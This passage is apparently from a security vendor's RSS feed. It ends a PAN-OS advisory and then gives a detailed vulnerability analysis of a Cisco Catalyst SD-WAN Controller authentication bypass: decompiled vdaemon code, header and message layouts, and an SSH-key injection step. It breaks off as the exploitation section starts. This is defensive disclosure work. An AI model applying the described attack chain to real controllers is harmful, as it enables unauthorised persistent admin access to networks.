05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.13-h21 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.16-h7 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.18-h6</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud NGFW</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>Older unsupported PAN-OS versions should be upgraded to a supported fixed version.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To determine if an environment is vulnerable, the official advisory </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Required%20Configuration%20for%20Exposure" target="_blank"><span style='font-size: undefined;'>provides instructions</span></a><span style='font-size: undefined;'> to verify whether an authentication profile using CAS is enabled and attached to a login interface. Due to discrepancies in the information shared by the vendor and reporting researchers, Rapid7 advises patching instead of implementing workarounds, wherever possible.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest official mitigation guidance, please refer to the </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Rapid7 customers</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0265 with authenticated checks expected to be available in the May 15th content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Updates</span></h3><ul><li><span style='font-size: undefined;'><strong>May 14, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-0265-authentication-bypass-in-palo-alto-networks-pan-os</link>
      <guid isPermaLink="false">blte92cb76c85ca8319</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 14 May 2026 19:15:49 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>While researching a critical authentication bypass vulnerability, </span><a href="/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127" target="_self"><span style='font-size: undefined;'>CVE-2026-20127</span></a><span style='font-size: undefined;'>, which was </span><a href="https://blog.talosintelligence.com/uat-8616-sd-wan/" target="_blank"><span style='font-size: undefined;'>exploited in-the-wild</span></a><span style='font-size: undefined;'>, </span><a href="/research" target="_self"><span style='font-size: undefined;'>Rapid7 Labs</span></a><span style='font-size: undefined;'> discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" target="_blank"><span style='font-size: undefined;'>CVE-2026-20182</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346), which is the same service that was vulnerable to CVE-2026-20127. The new vulnerability is not a patch bypass of CVE-2026-20127. It is a different issue located in a similar part of the “vdaemon” networking stack.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This impact however is the same,</span><span style='font-size: undefined;'><strong> a remote unauthenticated attacker can leverage CVE-2026-20182 to become an authenticated peer of the target appliance, and perform privileged operations</strong></span><span style='font-size: undefined;'>, such as injecting an attacker controlled public key into the </span><span style='font-size: undefined;'><span data-type='inlineCode'>vmanage-admin</span></span><span style='font-size: undefined;'> user account’s authorized SSH keys file. Once this has been performed, a remote unauthenticated attacker can login to the NETCONF service (SSH over TCP port 830) as the </span><span style='font-size: undefined;'><span data-type='inlineCode'>vmanage-admin</span></span><span style='font-size: undefined;'> user, and begin to issue arbitrary NETCONF commands.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-20182 has a CVSSv3.1 score of </span><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank"><span style='font-size: undefined;'>10.0</span></a><span style='font-size: undefined;'> (Critical), and a Common Weakness Enumeration (CWE) of </span><a href="https://cwe.mitre.org/data/definitions/287.html" target="_blank"><span style='font-size: undefined;'>CWE-287</span></a><span style='font-size: undefined;'>: Improper Authentication.</span></p><h2 style="direction: ltr;">Technical analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Cisco Catalyst SD-WAN Controller serves as the central control plane. Unlike Cisco Catalyst SD-WAN Manager, it has no web UI. Its network-reachable attack surface is narrow and depending on the configuration may expose the following ports:</span></p><p><span style='font-size: undefined;'></span></p><table><colgroup data-width='852'><col style="width:21.47887323943662%"/><col style="width:23.943661971830984%"/><col style="width:54.5774647887324%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Port</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Protocol</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Service</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>22</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>TCP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>SSH (OpenSSH)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>830</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>TCP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NETCONF over SSH</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>12346</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>UDP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vdaemon DTLS control plane</span></p></td></tr></tbody></table><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>UDP port 12346 is the DTLS-over-UDP control-plane peering port used by vdaemon for inter-controller and controller-to-edge communication. It carries Overlay Management Protocol (OMP) messages including route advertisements, Transport Locations (TLOC) tables, and peer state - the entirety of the SD-WAN overlay routing fabric. Compromising this service means compromising the network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To understand the vulnerability, we first need to understand how vdaemon authenticates control-plane peers. The protocol is a multi-phase handshake over DTLS:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">Attacker                                    vSmart
   |                                           |
   |──── DTLS Handshake (any cert) ───────────&gt;|  ← cert verify logs error but returns OK
   |                                           |
   |&lt;──── CHALLENGE (msg_type=8) ──────────────│  ← 256 random bytes + TLVs
   |                                           |
   |──── CHALLENGE_ACK (msg_type=9) ──────────&gt;|  ← device_type=2 (vHub) → NO VERIFICATION
   |                                           |
   |&lt;──── CHALLENGE_ACK_ACK (msg_type=10) ─────│  ← peer-&gt;authenticated = 1
   |                                           |
   |──── Hello (msg_type=5) ──────────────────&gt;|  ← passes auth check, peer goes UP
   |                                           |
   |&lt;──── Hello (msg_type=5) ──────────────────│  ← peer-type:vhub, new-state:up</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>After a DTLS handshake completes (which accepts any client certificate), the server sends a </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE</span></span><span style='font-size: undefined;'> containing 256 random bytes and a set of TLVs including Certificate Authority (CA) RSA public key components. The client must respond with a </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'>, and it is during the processing of this response, in </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_challenge_ack()</span></span><span style='font-size: undefined;'>, that device-type-specific certificate verification occurs. Or, in the case of a “vHub” device, does not occur.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The 12-byte message header format for the vdaemon protocol is as follows:</span></p><p></p><table><colgroup data-width='1179.7564102564102'><col style="width:13.583855858988708%"/><col style="width:11.410438921550517%"/><col style="width:15.078080003477467%"/><col style="width:59.92762521598331%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Byte Offset </strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Byte Size </strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Field</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Notes</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>msg_type</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Low nibble = type, high nibble = version</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>device_info</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>High nibble = device_type, low nibble = flags</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>flags</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Standard value of 0xA0</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>3</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>padding</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Always 0x00</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>4 - 7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>domain_id</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Big-endian uint32</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>8 - 11</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>site_id</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Big-endian uint32</span></p></td></tr></tbody></table><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The vdaemon protocol defines the following device types, encoded in the upper nibble of header byte 1, aka </span><span style='font-size: undefined;'><span data-type='inlineCode'>device_info</span></span><span style='font-size: undefined;'>:</span></p><p></p><table><colgroup data-width='750'><col style="width:14.423076923076922%"/><col style="width:33.493589743589745%"/><col style="width:52.083333333333336%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Value</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Device Type</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Role</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vEdge</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Data-plane router</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vHub</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Hub router</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>3</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vSmart</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Control-plane controller</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vBond</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Orchestrator (trust anchor)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>5</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vManage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Management plane</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ZTP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Zero-touch provisioning</span></p></td></tr></tbody></table><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>This is the core of the vulnerability. Below is a walk through of the decompiled code from </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_challenge_ack()</span></span><span style='font-size: undefined;'>, which processes the </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'> message sent by a connecting peer. After the DTLS handshake, the function extracts the peer's certificate serial number and then enters device-type-specific verification (Note: edited for brevity):</span></p><p style="direction: ltr;">⠀</p><pre language="cpp">// vdaemon!vbond_proc_challenge_ack()
// After extracting serial number from peer certificate via
// X509_get_serialNumber() / ASN1_INTEGER_to_BN() / BN_bn2hex()

// ...snip...

if ( *(_DWORD *)(a3 + 8) == 3 || *(_DWORD *)(a3 + 8) == 5 ) // &lt;--- [1]
{
// vSmart (type 3) or vManage (type 5): Certificate chain verification
v24 = is_serial_duplicate(v22, *(_DWORD *)(a3 + 8), ...);
if ( v24 )
    {
if ( (unsigned __int8)vbond_peer_dup_check(a1, a2, v24, ...) ) // &lt;--- [2]
{
            v19 = 36;  // ERR: Duplicate Serial
goto LABEL_179;  // REJECT
}
    }
}
// ...snip...

// Second verification block - additional cert & state checks
if ( *(_DWORD *)(a3 + 8) == 3 && *(_DWORD *)(a1 + 8) == 3 // &lt;--- [3]
|| *(_DWORD *)(a3 + 8) == 5 && *(_DWORD *)(a1 + 8) == 3
|| *(_DWORD *)(a3 + 8) == 5 && *(_DWORD *)(a1 + 8) == 5
|| *(_DWORD *)(a3 + 8) == 5 && *(_DWORD *)(a1 + 8) == 4
|| *(_DWORD *)(a3 + 8) == 3 && *(_DWORD *)(a1 + 8) == 4 )
{
    v19 = vdaemon_dtls_verify_peer_cert(a2);  // Full certificate verification
if ( v19 )
        v18 = 0;
    vdaemon_send_challenge_ack_ack(a1, *(_QWORD *)(a2 + 1232), a2, v18);
if ( v18 != 1 )
goto LABEL_179;  // REJECT on verification failure
vbond_send_ssh_keys_to_vmanage_peer(a1, a2);
}

if ( *(_DWORD *)(a3 + 8) == 1 // &lt;--- [4]
&& (dword_2A1A28 == 4 || dword_2A1A28 == 3 || dword_2A1A28 == 5) )
{
// vEdge (type 1): Hardware/virtual edge certificate verification
    // ... challenge signature, board ID, OTP verification ...
if ( vdaemon_verify_peer_bidcert(a2, ...) )
goto LABEL_179;  // REJECT on failure
}

// *** NO CODE PATH FOR device_type == 2 (vHub) *** // &lt;--- [5]

*(_BYTE *)(a2 + 70) = 1;   // peer-&gt;authenticated = true // &lt;--- [6]
return 0LL;                // Success</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>We can see from the above that the function implements device-type-specific verification through a series of conditional blocks:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At [1] above, the function checks whether the connecting peer claims to be a vSmart (type 3) or vManage (type 5). If so, it enters a certificate serial number lookup via </span><span style='font-size: undefined;'><span data-type='inlineCode'>is_serial_duplicate()</span></span><span style='font-size: undefined;'>, which searches the local certificate database for a matching serial. At [2], if the serial is found, a duplicate-serial check via </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_peer_dup_check()</span></span><span style='font-size: undefined;'> rejects the peer if a peer with that serial is already connected - preventing impersonation of existing authorized controllers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At [3], a second verification block performs full certificate chain verification via </span><span style='font-size: undefined;'><span data-type='inlineCode'>vdaemon_dtls_verify_peer_cert()</span></span><span style='font-size: undefined;'>. This block executes only for specific (</span><span style='font-size: undefined;'><span data-type='inlineCode'>peer_type</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>local_type</span></span><span style='font-size: undefined;'>) pairs: vSmart-to-vSmart, vManage-to-vSmart, vManage-to-vManage, vManage-to-vBond, and vSmart-to-vBond. </span><span style='font-size: undefined;'><strong>No pair in this block involves device type 2 (vHub).</strong></span><span style='font-size: undefined;'> If the verification function returns a non-zero error, v18 is set to 0, and the function jumps to </span><span style='font-size: undefined;'><span data-type='inlineCode'>LABEL_179</span></span><span style='font-size: undefined;'>, which  rejects the peer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At [4], vEdge peers (type 1) enter hardware certificate verification via </span><span style='font-size: undefined;'><span data-type='inlineCode'>vdaemon_verify_peer_bidcert()</span></span><span style='font-size: undefined;'>. This path validates either a hardware TPM-based certificate (for physical vEdge routers) or a virtual edge certificate, including challenge-response signature verification and board ID validation. Failure sends the function to </span><span style='font-size: undefined;'><span data-type='inlineCode'>LABEL_179</span></span><span style='font-size: undefined;'>, which  rejects the peer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At [5], </span><span style='font-size: undefined;'><strong>this is the bug</strong></span><span style='font-size: undefined;'>, there is no “if” block matching a device type of 2 (vHub); the vHub device type simply has no verification code. The function falls through every conditional without entering any of them.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At [6], the function unconditionally sets “</span><span style='font-size: undefined;'><span data-type='inlineCode'>*(_BYTE *)(a2 + 70) = 1</span></span><span style='font-size: undefined;'>”, which is equivalent to ”peer-&gt;authenticated = true”, and returns success. The authenticated flag at peer struct offset 70 is the single bit that gates all subsequent message processing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following table summarizes the verification applied to each device type:</span></p><p></p><table><colgroup data-width='1252'><col style="width:13.312034078807242%"/><col style="width:7.040018022446137%"/><col style="width:39.552101253379206%"/><col style="width:40.09584664536741%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Device Type </strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Value </strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Verification </strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Result </strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>vEdge</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>HW cert, challenge signature, board ID, OTP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Verified</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>vHub</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>None</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Falls through to “peer-&gt;authenticated = 1”</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>vSmart</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>3</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cert chain, serial lookup, duplicate check</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Verified</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>vBond</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A (trust anchor - handled elsewhere)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>vManage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>5</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cert chain, serial lookup, duplicate check</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Verified</span></p></td></tr></tbody></table><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Therefore, </span><span style='font-size: undefined;'><strong>a remote unauthenticated attacker can bypass authentication by connecting to the vSmart DTLS port with any self-signed client certificate and claiming to be a vHub (type 2) in the </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CHALLENGE_ACK</strong></span></span><span style='font-size: undefined;'><strong> message</strong></span><span style='font-size: undefined;'>. No valid credentials, no CA-signed certificate, and no knowledge of the SD-WAN deployment are required.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Looking further at the message dispatcher, we need to confirm that the </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'> message can actually reach </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_challenge_ack()</span></span><span style='font-size: undefined;'>  without prior authentication. The answer is in the pre-dispatch authentication gate in </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_msg()</span></span><span style='font-size: undefined;'>:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="cpp">// vdaemon!vbond_proc_msg()
// Pre-dispatch authentication gate:

if ( *(_BYTE *)(v100 + 70) != 1 // &lt;--- [1]
&& *(_DWORD *)(a3 + 4) != 5      // msg != Hello
&& *(_DWORD *)(a3 + 4) != 8      // msg != CHALLENGE
&& *(_DWORD *)(a3 + 4) != 9      // msg != CHALLENGE_ACK
&& *(_DWORD *)(a3 + 4)           // msg != NEW_CHALLENGE_ACK
&& *(_DWORD *)(a3 + 4) != 10     // msg != CHALLENGE_ACK_ACK
&& *(_DWORD *)(a3 + 4) != 7      // msg != Data
&& *(_DWORD *)(a3 + 4) != 11     // msg != TEAR_DOWN
  // ...snip...
)
{
// ...snip...
    // "Received an unexpected message from an un-authenticated device"
return 20;
}</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>We can see at [1] above, that the condition is a conjunction of negations: the incoming message is rejected only if the peer is NOT authenticated AND the message type is not one of the pre-authentication allowed types (</span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>NEW_CHALLENGE_ACK</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK_ACK</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>Data</span></span><span style='font-size: undefined;'>, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>TEAR_DOWN</span></span><span style='font-size: undefined;'>).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'> (Message type 9) is explicitly in the allow list, meaning it passes this gate without authentication and reaches the vulnerable </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_challenge_ack()</span></span><span style='font-size: undefined;'>. This is by design; the authentication handshake must be able to proceed before the peer is authenticated.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once the vulnerable </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_challenge_ack() </span></span><span style='font-size: undefined;'>sets “peer-&gt;authenticated = true” via the vHub bypass, the attacker must send a Hello message (Message type 5) to transition the peer to the UP state. The Hello handler has its own secondary authentication check:</span></p><p style="direction: ltr;"><span style='color:rgb(184, 6, 114);font-size: undefined;'></span></p><pre language="cpp">// Case 5 (Hello) in vbond_proc_msg - line 20362
case 5:
// ...snip...
if ( *(_BYTE *)(v100 + 70) != 1 ) // &lt;--- [2]
{
// "Received an unexpected HELLO from un-authenticated device"
        // ... cleanup and reject ...
return 0LL;
    }
// Process Hello normally - peer transitions to UP</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>At [2] above, the Hello handler verifies ”peer-&gt;authenticated == true” before processing. After our exploit sets this flag via the vHub bypass, Hello passes this secondary check and the peer transitions to the UP state, a fully trusted control-plane peer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Putting all the pieces together: the attack chain is DTLS handshake (any cert) → receive </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE</span></span><span style='font-size: undefined;'> → send </span><span style='font-size: undefined;'><span data-type='inlineCode'>CHALLENGE_ACK</span></span><span style='font-size: undefined;'> with device type 2 (vHub) → authentication flag set unconditionally → send Hello → peer transitions to UP.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>After establishing as an authenticated peer, the attacker has access to the full range of control-plane message types. We identified a particularly impactful post-authentication primitive: persistent SSH key injection via </span><span style='font-size: undefined;'><span data-type='inlineCode'>MSG_VMANAGE_TO_PEER</span></span><span style='font-size: undefined;'> (Message type 14).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The handler for message type 14 is </span><span style='font-size: undefined;'><span data-type='inlineCode'>vbond_proc_vmanage_to_peer()</span></span><span style='font-size: undefined;'>. Examining the decompiled code:</span></p><p style="direction: ltr;"><span style='color:rgb(184, 6, 114);font-size: undefined;'></span></p><pre language="cpp">// vdaemon!vbond_proc_vmanage_to_peer()

// ...snip...

stream = fopen("/home/vmanage-admin/.ssh/authorized_keys", "a+"); // &lt;--- [1]
if ( stream )
  {
if ( (unsigned __int8)read_key_data((const char *)(a3 + 32), stream) != 1 && *(_BYTE *)(a3 + 32) )
    {
if ( dword_241120 &gt; 6 )
        syslog(
191,
"%s[%d]: %%%s-%d: sshkey not present, writing to file",
"vbond_proc_vmanage_to_peer",
2368LL,
          aVdaemonDbgMisc,
7LL);
      fputs((const char *)(a3 + 32), stream); // &lt;--- [2]
}
    fclose(stream);
  }

// ...snip...</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>At [1] above, the file is opened in append mode - the attacker's key is added alongside any existing authorized keys, avoiding disruption of legitimate access. At [2], the attacker-controlled key buffer from the message body is written directly via fputs() with no sanitization.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The key injection message body is a fixed 769-byte structure:</span></p><p></p><table><colgroup data-width='843.1057692307693'><col style="width:11.4047192728351%"/><col style="width:11.262160281924661%"/><col style="width:77.33312044524024%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Offset</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Size</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Field</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>0-767</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>768</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Key buffer ("\n" + ssh_pubkey + "\n" + "\x00" + zero-padding)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>768</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>TLV count = 0</span></p></td></tr></tbody></table><p>⠀⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The leading </span><span style='font-size: undefined;'><span data-type='inlineCode'>“\n”</span></span><span style='font-size: undefined;'> ensures correct appending regardless of whether the existing </span><span style='font-size: undefined;'><span data-type='inlineCode'>authorized_keys</span></span><span style='font-size: undefined;'> file ends with a newline. The null byte terminates the string for </span><span style='font-size: undefined;'><span data-type='inlineCode'>fputs()</span></span><span style='font-size: undefined;'>, and the remainder is zero-padded to fill the 768-byte buffer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Any authenticated peer, regardless of device type, can inject SSH keys into the </span><span style='font-size: undefined;'><span data-type='inlineCode'>vmanage-admin</span></span><span style='font-size: undefined;'> user's </span><span style='font-size: undefined;'><span data-type='inlineCode'>authorized_keys</span></span><span style='font-size: undefined;'> file on vSmart. The </span><span style='font-size: undefined;'><span data-type='inlineCode'>vmanage-admin</span></span><span style='font-size: undefined;'> user is a specific internal, high-privileged service account used for automated communication between the management plane (vManage) and the control plane (vSmart/vBond). This converts a transient control-plane peering session into persistent, credential-independent high-privileged access.</span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In this example we will use the exploit developed by Rapid7 Labs and target a Cisco Catalyst SD-WAN Controller which has an IP address of 192.168.80.11. In our example, both the vdaemon service and the NETCONF service are bound to the same interface. The attacker will have an IP address of 192.168.80.130. In our example, the target Cisco Catalyst SD-WAN Controller appliance is running version 20.12.6.1, which was the </span><a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/release/notes/controllers-20-12/rel-notes-controllers-20-12.html" target="_blank"><span style='font-size: undefined;'>latest available version</span></a><span style='font-size: undefined;'> of the 20.12.* branch at the time of writing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To 